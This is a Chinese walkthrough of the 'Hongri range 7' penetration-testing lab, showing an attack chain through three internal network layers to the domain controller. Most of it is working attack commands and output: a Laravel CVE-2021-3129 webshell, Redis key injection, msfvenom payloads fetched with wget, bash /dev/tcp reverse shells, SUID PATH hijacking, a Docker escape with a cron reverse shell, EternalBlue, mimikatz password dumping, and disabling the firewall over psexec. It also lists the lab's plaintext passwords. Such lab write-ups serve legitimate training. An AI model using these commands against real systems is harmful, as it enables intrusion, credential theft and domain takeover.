带你打穿三层内网-红日靶场七

前记

所用工具

注意事项

  • msf的永恒之蓝每次都需要两次才能成功,即第二次才能成功,不成功可以多试试
  • 为模拟真实渗透环境,搭建了一层vps环境
  • 第二层内网本该出网的,为增加难度设置为不出网

环境配置

vm1,vm2,vm3均不出网

kali:192.168.123.128(vm3)

vps:192.168.123.129(vm3)

web1:192.168.52.10(vm1)
192.168.123.243(vm3)

web2:192.168.52.20(vm1)
192.168.93.10(vm2)

win7(PC1):192.168.52.30(vm1)
192.168.93.20(vm2)

win7(PC2):192.168.93.40(vm2)

DC:192.168.93.30(vm2)

其他信息

scss 复制代码
DMZ区域:
给Ubuntu (Web 1) 配置了两个网卡,一个可以对外提供服务;一个连接第二层网络。

第二层网络区域:
给Ubuntu (Web 2) 和Windows 7 (PC 1)都配置了两个网卡,一个连接第二层网络,一个连接第三层网络。

第三次网络区域:
给Windows Server 2012和Windows 7 (PC 2)都只配置了一个网卡,连接第三层网络。


Administrator:Whoami2021
bunny:Bunny2021
moretz:Moretz2021
Ubuntu 1: ubuntu:web2021
Ubuntu 2: ubuntu:ubuntu
通达OA账户: admin:admin657260

DMZ区的 Ubuntu 需要启动nginx服务:
sudo redis-server /etc/redis.conf
sudo /usr/sbin/nginx -c /etc/nginx/nginx.conf
sudo iptables -F
第二层网络的 Ubuntu需要启动docker容器:
sudo service docker start
sudo docker start 8e172820ac78
第三层网络的 Windows 7 (PC 1)需要启动通达OA:
C:\MYOA\bin\AutoConfig.exe

web1

信息搜集

sudo nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 512 --host-timeout 30 -T3 -v -oG result.txt --script http-methods --script-args http.useragent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0" 192.168.123.243 -p 0-65535

arduino 复制代码
22/tcp   open  ssh
80/tcp   open  http
81/tcp   open  hosts2-ns
6379/tcp open  redis

22可以爆破ssh

80无法访问,81是一个Laravel框架

6379可尝试未授权访问、弱口令爆破

less 复制代码
./fscan -h 192.168.123.243
[+] Redis:192.168.123.172:6379 unauthorized file:/home/web/dump.rdb
[+] Redis:192.168.123.172:6379 like can write /root/.ssh/
[+] Redis:192.168.123.172:6379 like can write /var/spool/cron/
[*] WebTitle: http://192.168.123.172    code:404 len:548    title:404 Not Found
[*] WebTitle: http://192.168.123.172:81 code:200 len:17474  title:Laravel
[+] InfoScan: http://192.168.123.172:81 [Laravel] 
[+] http://192.168.123.172:81 poc-yaml-laravel-cve-2021-3129

redis未授权,laravel存在cve

ini 复制代码
whatweb http://192.168.123.243:81/
发现这里是nginx中间件
http://192.168.123.243:81/ [200 OK] Cookies[XSRF-TOKEN,laravel_session], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ubuntu)], HttpOnly[laravel_session], IP[192.168.123.243], Laravel, PHP[7.4.14], Title[Laravel], X-Powered-By[PHP/7.4.14], nginx[1.14.0]

cve-2021-3129

先从81的Laravel框架漏洞入手

perl 复制代码
python laravel.py -u http://192.168.123.243:81/
python laravel.py -u http://192.168.123.243:81/ --exp
成功写入webshell, 访问地址 http://192.168.123.243:81/shell.php , 密码 whoami

拿到shell,为www权限

bash 复制代码
ls -alh /.dockerenv    非docker环境,一般没有这个.dockerenv文件
cat /proc/1/cgroup
cat /proc/self/status | grep CapEff

发现是docker,非特权模式开启的。先放着看看6379端口

redis未授权|ssh密钥

(1)redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;

(2)没有设置密码认证(一般为空),可以免密码远程登录redis服务。

探测漏洞

yaml 复制代码
python2 redis.py 192.168.123.243 6379
探测确实存在漏洞

利用漏洞

bash 复制代码
sudo su root
ssh-keygen -t rsa  #生成公钥
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > 1.txt
cat 1.txt | redis-cli -h 192.168.123.243 -p 6379 -x set hello
redis-cli -h 192.168.123.243
config set dir /root/.ssh
config set dbfilename authorized_keys
save
cd /root/.ssh/
ssh -i id_rsa root@192.168.123.243

后渗透

目标机器为linux,我们通过frp反向代理到vps,上线msf

frp配置

ini 复制代码
[common]
server_addr = 192.168.123.129
server_port = 9876
tls_enable = true
token = coleak
 
[CS_Server_6666]
type = tcp
local_ip = 127.0.0.1
local_port = 6666
remote_port = 6666
 
[Beacon]
type = tcp
local_ip = 127.0.0.1
local_port = 6667
remote_port = 6667

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 7777
remote_port = 7777

[cs->msf]
type = tcp
local_ip = 127.0.0.1
local_port = 4566
remote_port = 4566

[server]
type = tcp
local_ip = 127.0.0.1
local_port = 80
remote_port = 8888

上线msf

bash 复制代码
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.123.129 LPORT=7777 -f elf > shell.elf


use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 7777
show options
set AutoRunScript migrate -f
set PrependMigrate true
exploit


python -m http.server 80
wget http://192.168.123.129:8888/shell.elf
chmod +x shell.elf
./shell.elf

上线cs

bash 复制代码
监听https端口,6667
./genCrossC2.Linux 192.168.123.129 6667 .cobaltstrike.beacon_keys null Linux x64 /home/coleak/桌面/CrossC2-test
python -m http.server 80
wget http://192.168.123.129:8888/CrossC2-test
chmod +x CrossC2-test

Venom

bash 复制代码
agent监听端口,admin发起连接
wget http://192.168.123.129:8888/agent_linux_x64
./agent_linux_x64 -lport 8888
./admin_linux_x64 -rhost 192.168.123.243 -rport 8888

这里我们先把fscan上传到目标机器,对内网进行扫描

bash 复制代码
wget http://192.168.123.129:8888/fscan_amd64
chmod +x fscan_amd64
./fscan_amd64 -h 192.168.52.0/24
kotlin 复制代码
(icmp) Target 192.168.52.10   is alive
(icmp) Target 192.168.52.20   is alive
(icmp) Target 192.168.52.30   is alive
[*] Icmp alive hosts len is: 3
192.168.52.10:8888 open
192.168.52.20:8000 open
192.168.52.30:8080 open
192.168.52.30:445 open
192.168.52.30:139 open
192.168.52.30:135 open
192.168.52.20:22 open
192.168.52.10:22 open
192.168.52.10:81 open
192.168.52.10:80 open
[*] alive ports len is: 10
start vulscan
[+] 192.168.52.30       MS17-010        (Windows 7 Professional 7601 Service Pack 1)
[*] NetBios: 192.168.52.30   PC1.whoamianony.org                 Windows 7 Professional 7601 Service Pack 1 
[*] WebTitle: http://192.168.52.30:8080 code:200 len:10065  title:通达OA网络智能办公系统
[+] InfoScan:http://192.168.52.30:8080 [通达OA] 
[+] http://192.168.52.30:8080 tongda-user-session-disclosure 
[*] WebTitle: http://192.168.52.10      code:404 len:548    title:404 Not Found
[*] WebTitle: http://192.168.52.20:8000 code:200 len:17474  title:Laravel
[+] InfoScan:http://192.168.52.20:8000 [Laravel]

尝试MS17-010永恒之蓝进入win7

至于52.20这台机器从8000和22端口入手

这里查看nginx配置文件

bash 复制代码
nginx -t
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
cd /etc/nginx/conf.d/
cat 80
server {
    listen 80;
    server_name www.whopen.com;

    location / {
       proxy_pass https://whoamianony.top/;
    }
}

cat 81
server {
    listen 81;
    server_name localhost;

    location / {
       proxy_pass http://192.168.52.20:8000;
    }
}

外网81服务是内网8000进行Nginx反代出来的

Win7(PC1)

永恒之蓝

bash 复制代码
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.52.30
set RPORT 445
set lport 8526
setg Proxies socks5:127.0.0.1:9999
setg ReverseAllowProxy true
run

拿到web2的system权限,由于是windows,,所以上线cs操作

通过frp上线pc1到cs

在web1上开启s端

ini 复制代码
[common]
bind_port = 6789

在vps开启c端

ini 复制代码
[common]
server_addr = 192.168.123.243
server_port = 6789

[Beacon]
type = tcp
local_ip = 127.0.0.1
local_port = 6667
remote_port = 6667

注意我们已经将kali的6667和vps的6667关联,所以其实web1的6667最终流量会到达kali,注意监听器需要设置为web1的内网ip,通过http连接

arduino 复制代码
upload beacon1.exe c://Python27
shell
chcp 65001
beacon1.exe

web2

根据之前对nginx配置分析得知

bash 复制代码
http://192.168.123.243:81/shell.php , 密码 whoami
直接访问http://192.168.52.20:8000/shell.php

上线为www权限,还在docker中,考虑提权再逃逸

bash 复制代码
find / -perm -u=s -type f 2>/dev/null

/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/home/jobs/shell
/bin/mount
/bin/su
/bin/umount

反弹shell,这里需要将kali的监听端口转发到web1上,然后让web2来连接web1

yaml 复制代码
nc -lvp 3443
lforward 127.0.0.1 3443 3443
bash -c "bash -i >& /dev/tcp/192.168.52.10/3443 0>&1"

依次查找相关信息,发现shell可能存在漏洞,执行了ps命令

PID TTY TIME CMD 1 ? 00:00:00 apache2 119 ? 00:00:00 shell 120 ? 00:00:00 sh 121 ? 00:00:00 ps

bash 复制代码
cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH 
export PATH=/tmp:$PATH
cd /home/jobs
./shell

通过suid提权成功拿到root权限

docker逃逸

检测是否为特权模式开启

bash 复制代码
cat /proc/self/status | grep CapEff
以特权模式启动的话,CapEff 对应的掩码值应该为0000003fffffffff 或者是 0000001fffffffff

监听3445端口,并端口转发到web1

yaml 复制代码
nc -lvp 3445
lforward 127.0.0.1 3445 3445

设置定时任务将宿主机反弹shell到web1,再到kali

bash 复制代码
fdisk -l
mkdir /hacker
mount /dev/sda1 /hacker
touch /hacker/hacker.sh
echo "bash -i >& /dev/tcp/192.168.52.10/3445 0>&1" >/hacker/hacker.sh
echo "* * * * * root bash /hacker.sh" >> /hacker/etc/crontab

成功拿下web2的root权限

win7(PC2)|DC

通过win7(pc1)横向渗透,抓取hash和明文可以抓取到域内用户bunny的密码值,上传fscan对93c段进行扫描

shell C:\Python27\fscan64.exe -h 192.168.93.0/24 > 11.txt
download C:\Python27\11.txt

下载后放在目录/home/coleak/桌面/cs4.7by_mht_vip/downloads/中

less 复制代码
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.93.20   is alive
(icmp) Target 192.168.93.30   is alive
(icmp) Target 192.168.93.40   is alive
[*] Icmp alive hosts len is: 3
192.168.93.20:445 open
192.168.93.40:139 open
192.168.93.30:88 open
192.168.93.20:8080 open
192.168.93.40:445 open
192.168.93.30:445 open
192.168.93.30:139 open
192.168.93.40:135 open
192.168.93.30:135 open
192.168.93.20:139 open
192.168.93.20:135 open
[*] alive ports len is: 11
start vulscan
[+] 192.168.93.20	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[*] NetInfo:
[*]192.168.93.30
   [->]DC
   [->]192.168.93.30
[+] 192.168.93.40	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[+] 192.168.93.30	MS17-010	(Windows Server 2012 R2 Datacenter 9600)
[*] NetBios: 192.168.93.40   PC2.whoamianony.org                 Windows 7 Professional 7601 Service Pack 1 
[*] NetBios: 192.168.93.30   [+]DC DC.whoamianony.org            Windows Server 2012 R2 Datacenter 9600 
[*] WebTitle: http://192.168.93.20:8080 code:200 len:10065  title:通达OA网络智能办公系统
[+] InfoScan:http://192.168.93.20:8080 [通达OA] 
[+] http://192.168.93.20:8080 tongda-user-session-disclosure 
已完成 11/11
[*] 扫描结束,耗时: 15.9012269s

发现DC和win7-2均存在MS17-010永恒之蓝,上线venom

arduino 复制代码
goto 1
listen 8081
shell C:\Python27\agent.exe -rhost 192.168.52.10 -rport 8081
goto 2
socks 19999

通过msf上线

bash 复制代码
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.93.30
set RPORT 445
set lport 8527
setg Proxies socks5:127.0.0.1:19999
setg ReverseAllowProxy true
run

这里域控上线失败了,但是win7-2成功!

arduino 复制代码
migrate 1316
load kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords

成功抓到域用户和域管理员的密码

  • bunny:Bunny2021
  • administrator:Whoami2021

通过转发上线设置一个pc1的中转监听器,生成exe,上线cs

arduino 复制代码
upload beacon2.exe c://MYOA

在win7上关闭dc的防火墙

sql 复制代码
net use \192.168.93.30\ipc$ "Whoami2021" /user:"Administrator"
sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start unablefirewall

psexec到dc

bash 复制代码
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.30
set smbuser administrator
set smbpass Whoami2021
setg Proxies socks5:127.0.0.1:19999
setg ReverseAllowProxy true
run
相关推荐
hao_wujing2 小时前
网络安全攻防演练中的常见计策
安全·web安全
燕雀安知鸿鹄之志哉.2 小时前
攻防世界 web ics-06
网络·经验分享·安全·web安全·网络安全
鸭梨山大。4 小时前
Jenkins安全部署规范及安全基线
安全·中间件·jenkins
网安-轩逸4 小时前
网络安全核心目标CIA
安全·web安全
鸭梨山大。6 小时前
Jenkins 任意文件读取(CVE-2024-23897)修复及复现
安全·中间件·jenkins
黑客老陈6 小时前
新手小白如何挖掘cnvd通用漏洞之存储xss漏洞(利用xss钓鱼)
运维·服务器·前端·网络·安全·web3·xss
代码改变世界ctw13 小时前
如何学习Trustzone
安全·trustzone·atf·optee·tee·armv8·armv9
WTT001115 小时前
2024楚慧杯WP
大数据·运维·网络·安全·web安全·ctf
群联云防护小杜18 小时前
如何给负载均衡平台做好安全防御
运维·服务器·网络·网络协议·安全·负载均衡
ihengshuai18 小时前
HTTP协议及安全防范
网络协议·安全·http